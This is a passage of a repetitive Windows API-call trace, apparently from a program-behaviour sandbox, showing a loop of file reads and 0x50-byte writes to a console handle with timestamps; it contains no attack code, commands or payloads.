(_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.623] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] GetFileType (hFile=0x4c) returned 0x1 [0132.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.623] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: 
hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.624] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.624] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0132.624] GetFileType (hFile=0x4c) returned 0x1 [0132.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.624] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.625] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] GetFileType (hFile=0x4c) returned 0x1 [0132.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.625] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, 
lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.626] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] GetFileType (hFile=0x4c) returned 0x1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.626] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 
0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.627] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) 
returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] GetFileType (hFile=0x4c) returned 0x1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.627] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.628] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] GetFileType (hFile=0x4c) returned 0x1 [0132.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.628] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.629] ReadFile 
(in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] GetFileType (hFile=0x4c) returned 0x1 [0132.629] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.629] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.630] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, 